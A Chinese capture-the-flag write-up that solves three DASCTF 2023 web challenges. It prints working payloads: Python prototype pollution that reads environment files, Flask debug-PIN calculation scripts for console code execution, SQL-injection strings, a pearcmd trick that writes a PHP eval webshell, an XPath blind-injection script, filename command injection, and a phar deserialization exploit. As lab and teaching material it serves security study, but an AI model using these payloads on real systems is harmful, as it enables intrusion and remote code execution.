DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp

EzFlask

源码直接给了

Ctrl+U查看带缩进的源码

python 复制代码
import uuid

from flask import Flask, request, session
# 导入黑名单列表
from secret import black_list
import json

app = Flask(__name__)
# 为 Flask 应用设置一个随机的 secret_key
app.secret_key = str(uuid.uuid4())

# 检查字符串中是否包含黑名单中的敏感字符
def check(data):
    for i in black_list:
        if i in data:
            return False
    return True

# 合并两个字典或对象
def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

# 定义 user 类,用于存储用户信息
class user():
    def __init__(self):
        self.username = ""
        self.password = ""
        pass

    # 验证用户信息是否匹配
    def check(self, data):
        if self.username == data['username'] and self.password == data['password']:
            return True
        return False

# 存储用户对象的列表
Users = []

# 注册用户的路由处理函数
@app.route('/register',methods=['POST'])
def register():
    if request.data:
        try:
            # 检查请求数据是否合法
            if not check(request.data):
                return "Register Failed"
            # 将请求数据解析为 JSON 对象,所以我们发包要用json格式
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Register Failed"
            User = user()   # 创建 user 对象
            merge(data, User)   # 合并数据到 user 对象
            Users.append(User)   # 将 user 对象添加到用户列表中
        except Exception:
            return "Register Failed"
        return "Register Success"
    else:
        return "Register Failed"

# 登录的路由处理函数
@app.route('/login',methods=['POST'])
def login():
    if request.data:
        try:
            data = json.loads(request.data)   # 将请求数据解析为 JSON 对象
            if "username" not in data or "password" not in data:
                return "Login Failed"
            for user in Users:
                if user.check(data):   # 验证用户信息是否匹配
                    session["username"] = data["username"]   # 将用户名存储在会话中
                    return "Login Success"
        except Exception:
            return "Login Failed"
    return "Login Failed"

# 主页的路由处理函数,用于返回当前文件的源代码
@app.route('/',methods=['GET'])
def index():
    #__file__:全局变量,返回当前目录
    return open(__file__, "r").read()

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5010)   # 在指定的主机和端口上运行 Flask 应用

登录的账号密码是json格式的POST请求。

审计题目源码,发现他最后会回显当前目录文件的内容(就是源码),我们可以修改全局变量__file__,从而造成任意文件读取。

解法一:

题中源码有merge()函数,我们考虑python原型链污染。

参考:Python原型链污染变体(prototype-pollution-in-python) - Article_kelp - 博客园 (cnblogs.com)

NodeJs原型链污染中,对象的__proto__属性,指向这个对象所在的类的prototype属性。如果我们修改了son.__proto__中的值,就可以修改父类。

在Python中,所有以双下划线__包起来的方法,统称为Magic Method(魔术方法),它是一种的特殊方法,普通方法需要调用,而魔术方法不需要调用就可以自动执行。

python 复制代码
class A:
    pass

print(dir(A))  # 可以得到类所有公有成员

__class__方法用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 (题中可以不加)

__init__()方法是一种特殊的方法,被称为类的构造函数或初始化方法(类似PHP中的__construct()),当创建了这个类的实例时就会调用该方法。

__globals__对 保存函数全局变量的字典 的引用------定义函数的模块的全局命名空间。只读,但是可以修改无继承关系的类属性甚至全局变量

__file__全局变量,返回当前文件路径(目录)

python 复制代码
#globals辨析
secret_var = 114

def test():
    pass

class a:
    def __init__(self):
        pass

print(test.__globals__ == globals() == a.__init__.__globals__)
#True

题目过滤了__init__(构造函数)。

json识别unicode,我们可以用unicode绕过\u005F\u005F\u0069\u006E\u0069\u0074\u005F\u005F

也可以使用类中方法check代替类中构造方法__init__

常见的linux系统下环境变量的路径:

/proc/1/environ (本题flag就在这里)

/etc/profile

/etc/profile.d/*.sh

~/.bash_profile

~/.bashrc

/etc/bashrc

注:放在proc目录(3,4)下的环境变量配置文件,只会对当前用户起作用;在/etc下的环境变量所有的用户都起作用;

最后payload: (直接读取环境变量)

json 复制代码
{
	"username":"aaa",
	"password":"bbb",
	"__class__":{
        "check":{
            "__globals__":{
                "__file__" : "/proc/1/environ"
            }
        }
	}
}

Boogipop师傅的payload:

json 复制代码
{
    "username":1,
	"password":1,
    "__init\u005f_":{
        "__globals__":{
            "app":{
                "_static_folder":"/"
            }
        }
    }
}

看不懂,尝试了一下确实可行,又学到了。

在 Python 中,全局变量 app_static_folder 通常用于构建 Web 应用程序,并且这两者在 Flask 框架中经常使用。

  1. app 全局变量:

    • app 是 Flask 应用的实例,是一个 Flask 对象。通过创建 app 对象,我们可以定义路由、处理请求、设置配置等,从而构建一个完整的 Web 应用程序。
    • Flask 应用实例是整个应用的核心,负责处理用户的请求并返回相应的响应。可以通过 app.route 装饰器定义路由,将不同的 URL 请求映射到对应的处理函数上。
    • app 对象包含了大量的功能和方法,例如 routerunadd_url_rule 等,这些方法用于处理请求和设置应用的各种配置。
    • 通过 app.run() 方法,我们可以在指定的主机和端口上启动 Flask 应用,使其监听并处理客户端的请求。
  2. _static_folder 全局变量:

    • _static_folder 是 Flask 应用中用于指定静态文件的文件夹路径。静态文件通常包括 CSS、JavaScript、图像等,用于展示网页的样式和交互效果。
    • 静态文件可以包含在 Flask 应用中,例如 CSS 文件用于设置网页样式,JavaScript 文件用于实现网页的交互功能,图像文件用于显示图形内容等。
    • 在 Flask 中,可以通过 app.static_folder 属性来访问 _static_folder,并指定存放静态文件的文件夹路径。默认情况下,静态文件存放在应用程序的根目录下的 static 文件夹中。
    • Flask 在处理请求时,会自动寻找静态文件的路径,并将静态文件发送给客户端,使网页能够正确地显示样式和图像。

综上所述,app_static_folder 这两个全局变量在 Flask 应用中都扮演着重要的角色,app 是整个应用的核心实例,用于处理请求和设置应用的配置,而 _static_folder 是用于指定静态文件的存放路径,使网页能够正确地加载和显示样式和图像。

/static/proc/1/environ:由于"_static_folder":"/"把静态目录直接设置为了根目录,所以根目录下/proc/1/environ可以通过访问静态目录/static/proc/1/environ访问。

解法二:

boogipop师傅的博客说:题目是开启了flask的debug模式,访问console控制台,配合刚刚的任意文件读取算pin进行rce就行了。

访问/console路由

PIN码也就是flask在开启debug模式下,进行代码调试模式的进入密码,需要正确的PIN码才能进入调试模式

pin码生成要六要素:

1.username

通过getpass.getuser()读取或者通过文件读取/etc/passwd

2.modname

通过getattr(mod,"file",None)读取,默认值为flask.app

3.appname

通过getattr(app,"name",type(app).name)读取,默认值为Flask

4.moddir

flask库下app.py的绝对路径、当前网络的mac地址的十进制数,通过getattr(mod,"file",None)读取实际应用中通过报错读取,如传参的时候给个不存在的变量

5.uuidnode

mac地址的十进制,通过uuid.getnode()读取,通过文件/sys/class/net/eth0/address得到16进制结果,转化为10进制进行计算

6.machine_id

机器码,每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id/proc/sys/kernel/random/boot_id,docker靶机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id,在非docker环境下读取后两个,非docker环境三个都需要读取。一般生成pin码不对就是这错了

python3.6采用MD5加密,3.8采用sha1加密。脚本们如下:

python 复制代码
#MD5
import hashlib
from itertools import chain
probably_public_bits = [
     'flaskweb'# username
     'flask.app',# modname
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
     '25214234362297',# str(uuid.getnode()),  /sys/class/net/ens33/address
     '0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
   h.update(b'pinsalt')
   num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
   for group_size in 5, 4, 3:
       if len(num) % group_size == 0:
          rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                      for x in range(0, len(num), group_size))
          break
       else:
          rv = num

print(rv)
python 复制代码
#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'root'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    '2485377581187',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个):1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '653dc458-4634-42b1-9a7a-b22a082e1fce55d22089f5fa429839d25dcea4675fb930c111da3bb774a6ab7349428589aefd'#  /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

那就开始用 解法一 读取PIN值六要素


username:root


modname:默认值为flask.app


appname:默认值为Flask


moddir:/usr/local/lib/python3.10/site-packages/flask/app.py


uuidnode:4e:35:a1:94:9e:da

十进制是85992251104986


machine_id:96cec10d3d9307792745ec3b85c89620docker-f631baf753180826471e91bf575eecadcfd9788e873f07b98fe6f7a4a95f42c3.scope

其中,以docker为界限。

96cec10d3d9307792745ec3b85c89620

/proc/sys/kernel/random/boot_id里面

docker-f631baf753180826471e91bf575eecadcfd9788e873f07b98fe6f7a4a95f42c3.scope

/proc/self/cgroup里面

解题脚本来源:2023DASCTF&0X401 WriteUp (qq.com)

python 复制代码
import hashlib
from itertools import chain

# 可能的公共部分,包括用户名、模块名、类名以及相关模块路径信息
probably_public_bits = [
    'root',                # username
    'flask.app',           # modname
    'Flask',               # appname
    '/usr/local/lib/python3.10/site-packages/flask/app.py'   # moddir
]

# 私有部分,包括一些唯一的标识信息
private_bits = [
    '85992251104986',       # uuidnode
    '96cec10d3d9307792745ec3b85c89620docker-f631baf753180826471e91bf575eecadcfd9788e873f07b98fe6f7a4a95f42c3.scope'  # machine_id
]

# 创建 SHA-1 哈希对象
h = hashlib.sha1()

# 将可能的公共部分和私有部分的信息串联在一起,并计算 SHA-1 哈希值
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)

# 更新哈希值,使用 b'cookiesalt' 作为额外的盐值
h.update(b'cookiesalt')

# 构造 cookie 名称 '__wzd' + SHA-1 哈希值的前20位
cookie_name = '__wzd' + h.hexdigest()[:20]

num = None

# 如果 num 为空,则计算 num 值
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None

# 如果 rv 为空,则根据 num 的长度进行格式化处理,组成带分隔符的字符串
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

# 打印结果
print(rv)

运行结果:960-245-355

成功进入控制台

获取flag

(3条消息) 关于ctf中flask算pin总结_丨Arcueid丨的博客-CSDN博客

(3条消息) Flask debug模式算pin码_flask pin码_Ys3ter的博客-CSDN博客

扩展练习:

CTFSHOW 801

[GYCTF2020]FlaskApp

HSCSEC-2TH EZFLASK

ez_cms

CMS是Content Management System的缩写,意为"内容管理系统"。

熊海CMS,版本1.0

(4条消息) 熊海(isea cms)代码审计漏洞总结_熊海靶场_Alexz__的博客-CSDN博客

(4条消息) 熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)--文件包含漏洞_十三年*的博客-CSDN博客

熊海cms公开漏洞

一、后台越权登录admin用户

在cookie中直接添加user : admin字段,即可登录admin用户

也可以弱口令登录。

账号:admin 密码:123456

二、/admin后台登录中SQL注入

/admin/?r=login

【操作系统是Linux】
1' and extractvalue(1,concat(0x7e,@@version_compile_os,0x7e))-- 

【爆库】
#information_schema,ctf,mysql,performance_scheme,sys

1' and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))--+

【爆ctf库的表】
#adword,content,download,imageset,interaction,link,manage,nav,navclass,seniorset,settings

1' and updatexml(1,substring(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctf'),0x7e),n,m),3) --+

【爆列/字段】
#~id,navclass,title,toutiao,autho
1' and extractvalue(1,substring(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='content')),1,50))--+

#id,ad1,ad2,ad3,date
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='adword')))--+

#id,title,keywords,description,i
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='download')))--+

#
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='imagese')))--+

三、文件包含漏洞

/?r=../../test/phpinfo

题目中复现不了,任意文件包含应该有过滤什么的。

四、存储型XSS

题目中可以复现,但是和SQL一样,无用

五、管理员界面CSRF删除文章

题目中可以复现,但是和SQL一样,无用

六、文件上传

管理员界面==》发布内容 有两个文件上传点。

左边那个上传点,会显示 上传失败!文件移动发生错误!

右边那个上传点,会显示目录创建失败。

文件上传从而注入一句话木马行不通。

七、任意文件下载

管理员界面= =》内容管理= =》下载列表= =》铅笔形状按钮。

我们可以修改下载的路径。

保存好后,点击绿色钩子按钮,点击电信或者联通下载即可下载对应文件。

经过测试发现,我们可以下载/etc/passwd,但是无法下载环境变量所在的文件如/proc/1/environ,有权限限制。

由六七两个文件方面的漏洞,推测出题人修改了部分文件/文件夹的权限,咱们无法使用网络上现成的攻击方法,需要另辟蹊径。

本题解题方法:

尝试第七点------任意文件下载,下载index.php

php 复制代码
<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>

第四行addslashes()函数做了过滤,因此无法使用伪协议。

第六行include('files/'.$action.'.php');说明包含的时候拼接了.php


我们选择使用**pear文件包含**

参考:

pear文件利用 (远程文件下载、生成配置文件、写配置文件) 从一道题看------CTFshow私教 web40_Jay 17的博客-CSDN博客

https://blog.csdn.net/Mrs_H/article/details/122386511

https://y4tacker.github.io/2022/06/19/year/2022/6/关于pearcmd利用总结/#闲话

https://blog.csdn.net/Mrs_H/article/details/122386511

https://blog.csdn.net/weixin_49656607/article/details/124005355

https://www.cnblogs.com/iwantflag/p/15602747.html

pear是PHP的一个扩展

PEAR扩展

全称:PHP Extension and Application Repository

PEAR扩展默认安装位置是: /usr/local/lib/php/

argv是数组,argc是数字。可通过var_dump($_SERVER);语句查看

argv有独立GET之外获取参数的作用。比如传入?aaa+bbb argv(数组)两个元素是aaa和bbb,argc是数组的长度。&符号无发分割参数,真正能分割参数的是+,等号无法赋值,而是会直接被传进去当作参数。

php中有些文件(pearcmd.php)是通过argv和argc来获取参数的。

条件:

1 有文件包含点
2 开启了pear扩展   (可以当他是一个框架)
3 配置文件中register_argc_argv 设置为On,而默认为Off($_SERVER['argv']生效)
4 找到pear文件的位置,默认位置是/usr/local/lib/php/pearcmd.php

pearcmd.php可以接受config-create命令,阅读其代码和帮助,可以知道,这个命令需要传入两个参数,其中第二个参数是写入的文件路径,第一个参数会被写入到这个文件中。


这题pear文件的路径与默认不一样,也算个坑。以下是别的师傅对于路径的寻找过程。

网上现成的payload:

?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=@eval($_POST['cmd']);?>+/tmp/test.php

这里被包含的参数file需要换成r。路径得换一下,换成/usr/share/php/pearcmd.php。代码在r传入的数据后,自动加了一个.php,那我们路径就设置为/usr/share/php/pearcmd就行了。以及test.php在原文是提前准备好的,这里的Jay17.php原先是不存在的,得出这里的文件如果不存在,是可以新建的。

payload:

?+config-create+/&r=../../../../../../../../usr/share/php/pearcmd&/<?=@eval($_POST['cmd']);?>+/tmp/Jay17.php

之后,传入payload

访问根目录下/tmp/Jay17.php,不要忘了r参数自动加一个.php

RCE获取flag。

MyPicDisk

开题是一个登录框

步骤一:登录

方法一:我们可以用万能密码登录

抓包改包,payload如下:

username=admin' or 1=1#&password=123456&submit=%E7%99%BB%E5%BD%95

方法二:XXE盲注 注出admin的密码

这里贴一个boogipop师傅的盲注脚本:

python 复制代码
import requests
import time
url ='http://6562827c-cc7e-4a5e-818d-97f9064dfce0.node4.buuoj.cn:81/index.php'


strs ='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'


flag =''
for i in range(1,100):
    for j in strs:
        #猜测根节点名称 #accounts
        # payload_1 = {"username":"<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password>".format(i,j),"password":123}
        # payload_username ="<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password>".format(i,j)

        #猜测子节点名称 #user
        # payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        # payload_username ="<username>'or substring(name(/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password>".format(i,j)



        #猜测accounts的节点
        # payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #猜测user节点
        # payload_4 ="<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])

        #跑用户名和密码 #admin #003d7628772d6b57fec5f30ccbc82be1
        # payload_username ="<username>'or substring(/accounts/user[1]/username/text(), {}, 1)='{}'  or ''='".format(i,j)、
        # payload_username ="<username>'or substring(/accounts/user[1]/password/text(), {}, 1)='{}'  or ''='".format(i,j)


        payload_username ="<username>'or substring(/accounts/user[1]/password/text(), {}, 1)='{}'  or ''='".format(i,j)
        data={
            "username":payload_username,
            "password":123,
            "submit":"1"
        }


        print(payload_username)
        r = requests.post(url=url,data=data)
        time.sleep(0.1)
        # print(r.text)


        if "登录成功" in r.text:
            flag+=j
            print(flag)
            break

    if "登录失败" in r.text:
        break

print(flag)

跑出用户名是admin,密码是003d7628772d6b57fec5f30ccbc82be1

密码看特征是MD5加密过的,在线网站解密一下。

CMD5,emmmm,楽。

还得是somd5

账号:admin 密码:15035371139

这个应该是预期解。其他两种方法,登录成功登录账户不是admin,会alert返回you are not admin!!!!!


方法三:

网上一个看不懂的payload:

username=admin'&password=admin'&submit=%E7%99%BB%E5%BD%95

暂时没想到原理。


登录成功后,在源码中看见提示,是y0u_cant_find_1t.zip文件。

步骤二:获取源码

访问/y0u_cant_find_1t.zip路由,下载源码,源码如下:

php 复制代码
<?php
session_start();
error_reporting(0);
class FILE{
    public $filename;
    public $lasttime;
    public $size;
    public function __construct($filename){
        if (preg_match("/\//i", $filename)){
            throw new Error("hacker!");
        }
        $num = substr_count($filename, ".");
        if ($num != 1){
            throw new Error("hacker!");
        }
        if (!is_file($filename)){
            throw new Error("???");
        }
        $this->filename = $filename;
        $this->size = filesize($filename);
        $this->lasttime = filemtime($filename);
    }
    public function remove(){
        unlink($this->filename);
    }
    public function show()
    {
        echo "Filename: ". $this->filename. "  Last Modified Time: ".$this->lasttime. "  Filesize: ".$this->size."<br>";
    }
    public function __destruct(){
        system("ls -all ".$this->filename);
    }
}
?>
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>MyPicDisk</title>
</head>
<body>
<?php
if (!isset($_SESSION['user'])){
  echo '
<form method="POST">
    username:<input type="text" name="username"></p>
    password:<input type="password" name="password"></p>
    <input type="submit" value="登录" name="submit"></p>
</form>
';
  $xml = simplexml_load_file('/tmp/secret.xml');
  if($_POST['submit']){
    $username=$_POST['username'];
    $password=md5($_POST['password']);
    $x_query="/accounts/user[username='{$username}' and password='{$password}']";
    $result = $xml->xpath($x_query);
    if(count($result)==0){
      echo '登录失败';
    }else{
      $_SESSION['user'] = $username;
        echo "<script>alert('登录成功!');location.href='/index.php';</script>";
    }
  }
}
else{
    if ($_SESSION['user'] !== 'admin') {
        echo "<script>alert('you are not admin!!!!!');</script>";
        unset($_SESSION['user']);
        echo "<script>location.href='/index.php';</script>";
    }
  echo "<!-- /y0u_cant_find_1t.zip -->";
  if (!$_GET['file']) {
    foreach (scandir(".") as $filename) {
      if (preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
        echo "<a href='index.php/?file=" . $filename . "'>" . $filename . "</a><br>";
      }
    }
    echo '
  <form action="index.php" method="post" enctype="multipart/form-data">
  选择图片:<input type="file" name="file" id="">
  <input type="submit" value="上传"></form>
  ';
    if ($_FILES['file']) {
      $filename = $_FILES['file']['name'];
      if (!preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
        die("hacker!");
      }
      if (move_uploaded_file($_FILES['file']['tmp_name'], $filename)) {
          echo "<script>alert('图片上传成功!');location.href='/index.php';</script>";
      } else {
        die('failed');
      }
    }
  }
  else{
      $filename = $_GET['file'];
      if ($_GET['todo'] === "md5"){
          echo md5_file($filename);
      }
      else {
          $file = new FILE($filename);
          if ($_GET['todo'] !== "remove" && $_GET['todo'] !== "show") {
              echo "<img src='../" . $filename . "'><br>";
              echo "<a href='../index.php/?file=" . $filename . "&&todo=remove'>remove</a><br>";
              echo "<a href='../index.php/?file=" . $filename . "&&todo=show'>show</a><br>";
          } else if ($_GET['todo'] === "remove") {
              $file->remove();
              echo "<script>alert('图片已删除!');location.href='/index.php';</script>";
          } else if ($_GET['todo'] === "show") {
              $file->show();
          }
      }
  }
}
?>
</body>
</html>

步骤三:分析源码,解决session问题

注:如果选择XXE盲注出账号密码登录,步骤三不用看。

尝试了一下,登录之后是用session来判断是否登录成功的。比如我用正确的账号密码登录,此时session改成jay17

我浏览器里面session改为jay17,就可以直接绕过登录,直接跳转到上传文件界面。

猜测后台是在用户登录成功后,储存用户session,下次登陆时比较用户session来判断用户是否登录成功过。


上文提到,除XXE盲注外其他两种方法,登录成功登录账户不是admin,会alert返回you are not admin!!!!!

同时,由代码片段66~78行

php 复制代码
else{
    if ($_SESSION['user'] !== 'admin') {
        echo "<script>alert('you are not admin!!!!!');</script>";
        unset($_SESSION['user']);
        echo "<script>location.href='/index.php';</script>";
    }
    echo "<!-- /y0u_cant_find_1t.zip -->";
    if (!$_GET['file']) {
        foreach (scandir(".") as $filename) {
            if (preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
                echo "<a href='index.php/?file=" . $filename . "'>" . $filename . "</a><br>";
            }
        }

可以看出,如果登录的用户名不是admin,会自动删除session(语句unset($_SESSION['user']);),但是删完之后还会继续运行(72行echo之后),只不过下一次运行时,由于没有session,不会进入这个else(66行),导致下一次无法操作。

所以这里存在一个代码逻辑漏洞,使得我们非预期登录(不是XXE盲注),也能做题,也能利用漏洞得到flag。

我们只需,在==每次 ==操作之前(比如上传一个文件),burp发一个包,使我们session不为空,能执行else代码块(66行)就行。操作之后,由于执行了else代码块(66行),session又被删除了,所以下一次操作前又得发包,生成session。

burp包如下:

POST / HTTP/1.1
Host: 6562827c-cc7e-4a5e-818d-97f9064dfce0.node4.buuoj.cn:81
Content-Length: 64
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://6562827c-cc7e-4a5e-818d-97f9064dfce0.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://6562827c-cc7e-4a5e-818d-97f9064dfce0.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=xxx
Connection: close

username=admin' or 1=1 -- +&password=1&submit=%E7%99%BB%E5%BD%95

但是这里发包也有要求,发完之后回显的要是alert('登录成功!');。此时就是执行了if代码段(44~65行),生成了session。

但是这样一次一次生成session太麻烦了,建议,就算是非预期得到了源码,分析完源码得知有XXE盲注的可能之后,回去XXE盲注拿admin的密码重新登录。

步骤四:分析源码,进行RCE

源码没有libxml_disable_entity_loader(false);语句,禁止外部实体载入。不能通过XXE来RCE。另寻他法。


方法一:字符串拼接执行命令。

重点看代码段30~32行

php 复制代码
public function __destruct(){
        system("ls -all ".$this->filename);
    }

FILE类的析构方法会把命令和文件名拼接在一起然后执行。

当然源码对文件名也有所过滤。8~22行构造方法,要求文件名不能包含斜杠 /。点号.只能出现一次(substr_count()函数作用是计算字符在字符串中出现的次数)。
73~78行要求文件名中必须包含.(jpg|jpeg|gif|png|bmp),相当于白名单,只允许这四个后缀。

那么我们使文件名如下,就即绕过了过滤限制,又能执行命令了。

;`echo 命令的base64编码| base64 -d`;.jpg

payload:

先通过登录后的文件上传功能 或者 自己写表单上传图片。一定要上传图片,要不然下一步时,实例化的时候构造方法(__construct())获取不了图片大小和最后修改时间(20、21行),导致报错而不执行析构方法(__destruct())。从而无法RCE。

然后通过?file=图片名访问图片,传入?file=图片名后会根据图片名实例化FILE类,执行里面的析构方法。

?file=;`echo Y2F0IC9hZGoq | base64 -d`;.jpg

方法二:phar反序列化

可利用代码段(99行

php 复制代码
echo md5_file($filename);

一般参数是string形式的文件名称($filename)的函数,都可以用来解析phar。

所以,这个md5_file函数可以解析phar文件。

同时,我们访问phar文件时,是通过GET方法提交?file=什么什么,源代码没有对?file进行过滤,我们可以使用使用phar协议phar://

此外,对于上传文件后缀的限制,phar://的伪协议,可以将任意后缀名 的压缩包(原来是 .phar 或 .zip,注意:PHP > =5.3.0 压缩包需要是zip协议压缩,rar不行 ) 解包,从而可以通过上传压缩包绕过对后缀名的限制,再利用伪协议实现文件包含。那我们可以上传我们生成的phar文件,通过burp抓包使文件后缀名变为.jpg

总结一下,天时地利人和,我们可以使用phar反序列化来RCE。

注:前文提到过:实例化的时候构造方法(__construct())获取不了图片大小和最后修改时间(20、21行),导致报错而不执行析构方法(__destruct())。从而无法RCE。phar包里面的文件不存在,自然也没有大小,为什么不报错不影响析构方法(__destruct())执行呢。因为这里phar包传进去根本不触发构造方法(__construct()),传进去是序列化字符串,构造方法在本地构造时触发过了。

同理,phar包里面的文件名$filename(RCE的命令),因为不触发构造方法(__construct()),所以也不用绕过过滤了。

构造phar包脚本:

php 复制代码
<?php

class FILE{
    public $filename;
    public $lasttime;
    public $size;
    public function __construct($filename){
        $this->filename = $filename;
    }
}

$a = new FILE(";tac /adj*");  //源码不查phar里面的内容
$phar=new phar('xxx.phar');
$phar->startBuffering();
//往metaData里面放实例对象,使用phar协议读取phar包时,如果当前脚本识别了这个类(有这个类),会自动调用这个类的魔术方法
$phar->setMetadata($a);
//设置stub,固定写法
$phar->setStub("<?php __HALT_COMPILER();?>");
//添加要压缩的文件,这个文件没有也没关系,走个流程
$phar->addFromString("test.txt","test");
$phar->stopBuffering();

将生成的phar包上传并且修改后缀。

这里需要手动访问,用phar伪协议。todo=md5是为了调用md5_file()函数,函数用来解析phar

?file=phar://xxx.jpg&todo=md5

踩坑点:

字符集不要乱改,谢谢,卡了一晚上。其实也没啥事,不就是卡题吗,不就是生活吗,人活着哪有不疯的时候,不疯的人还活着吗。人又不是葱姜蒜西瓜茄子萝卜芒果猕猴桃。可能我是猴子呢!我是猴子!哈!嘿!吼!哈哈哈哈哈哈哈哈哈哈哈哈哈我是猴子,我不用卡题的(变成猿猴)(抢夺路人的香蕉)(飞入丛林)(在藤蔓中荡来荡去)(在藤蔓中荡来荡去)(在藤蔓中荡来荡去)(在藤蔓中荡来荡去)(高声吼叫)(高声吼叫)(在藤蔓中荡来荡去)(高声吼叫)(在藤蔓中荡来荡去)(高声吼叫)(在藤蔓中荡来荡去)

相关推荐
也无晴也无风雨1 小时前
深入剖析输入URL按下回车,浏览器做了什么
前端·后端·计算机网络
SRC_BLUE_171 小时前
SQLI LABS | Less-39 GET-Stacked Query Injection-Intiger Based
android·网络安全·adb·less
Martin -Tang1 小时前
Vue 3 中,ref 和 reactive的区别
前端·javascript·vue.js
懒惰的bit2 小时前
基础网络安全知识
学习·web安全·1024程序员节
FIN技术铺2 小时前
Redis集群模式之Redis Sentinel vs. Redis Cluster
数据库·redis·sentinel
FakeOccupational3 小时前
nodejs 020: React语法规则 props和state
前端·javascript·react.js
放逐者-保持本心,方可放逐3 小时前
react 组件应用
开发语言·前端·javascript·react.js·前端框架
冰水°3 小时前
2.5_XXE(XML外部实体注入)
xml·安全·网络安全·xml外部实体注入·外部实体注入·xml漏洞
是谁谁谁4 小时前
【cft.show-web3解题思路】-php://input伪协议
web安全·网络安全·系统安全
CodingBrother4 小时前
MySQL 中的 `IN`、`EXISTS` 区别与性能分析
数据库·mysql